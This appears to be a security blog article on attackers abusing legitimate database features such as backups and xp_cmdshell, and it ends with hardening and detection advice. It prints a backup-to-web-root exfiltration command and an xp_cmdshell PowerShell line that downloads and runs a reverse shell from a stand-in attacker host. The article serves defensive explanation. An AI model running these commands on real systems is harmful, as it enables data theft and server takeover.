TRUST IS A VULNERABILITY: Analyzing the Attack Wave Compromising Databases with Legitimate Commands    

Chapter 1: The New Insider Threat — When Your Database Becomes the Attacker

A new wave of sophisticated attacks is targeting the heart of the enterprise: the database. But these attackers aren't just running `SELECT * FROM users`. They are "Living Off the Land" *inside* your data layer. Once they gain a foothold—often via a stolen credential or a simple SQL injection—they are abusing your database's own trusted, legitimate, and powerful administrative features to conduct stealthy data exfiltration and achieve full remote code execution on the underlying server. This TTP is incredibly difficult to detect because, to many security tools, the database is just doing its job. The trusted process has become the attack vector.

Chapter 2: TTP #1 — Weaponizing Backup Utilities for Mass Data Exfiltration

One of the simplest and most effective techniques is the abuse of native backup commands.

The Attack:

An attacker with privileged access to a SQL database can execute a standard backup command, but with a malicious twist. They direct the output of the full database backup to a file in a web-accessible directory, such as the web server's root.

BACKUP DATABASE customer_data TO DISK = 'C:\inetpub\wwwroot\backup.bak';

The attacker can then simply use their web browser to navigate to `http://victim.com/backup.bak` and download the entire multi-gigabyte database. To a file integrity monitor or a basic security tool, the database server just performed a normal, authorized backup operation.

Chapter 3: TTP #2 — Abusing Native Functions for OS-Level Code Execution

An even more dangerous technique is the abuse of built-in functions that allow the database to interact with the underlying operating system.

The Attack:

Many databases, like Microsoft SQL Server, include powerful (and dangerous) stored procedures like `xp_cmdshell`. This is a legitimate feature that allows a DBA to execute OS commands from a SQL query. If an attacker gains `sysadmin` rights on the database, they can use this feature to get a shell on the server.

EXEC xp_cmdshell 'powershell -c "iex(new-object net.webclient).downloadstring(''http://attacker.com/revshell.ps1'')"'

This command, executed by the trusted `sqlservr.exe` process, will download and run a reverse shell, giving the attacker a full system compromise. This is the ultimate **Living Off the Land** technique.

Chapter 4: The Defender's Playbook — A Guide to Hardening and Detection

Defending against these attacks requires a shift from signature-based prevention to behavioral detection and a strict adherence to the Principle of Least Privilege.

1. Enforce Least Privilege

This is your most critical defense. The service accounts used by your web applications should **NEVER** have administrative, backup, or command execution privileges. Their permissions should be scoped down to the absolute minimum required (e.g., only `SELECT`, `INSERT`, `UPDATE` on specific tables).

2. Harden Your Database Configuration

Disable dangerous features like `xp_cmdshell` unless there is an overwhelming and documented business need. If they are required, their usage must be strictly controlled and heavily audited.

3. Hunt for the Behavior (The Golden Signal)

You must hunt for the anomalous behavior. Your database process (`sqlservr.exe`, `postgres.exe`, etc.) should **NEVER** be the parent of a command shell (`cmd.exe`, `powershell.exe`, `/bin/sh`) or a network utility (`curl`, `wget`). This is a definitive "golden signal" of compromise that only a modern EDR can reliably detect.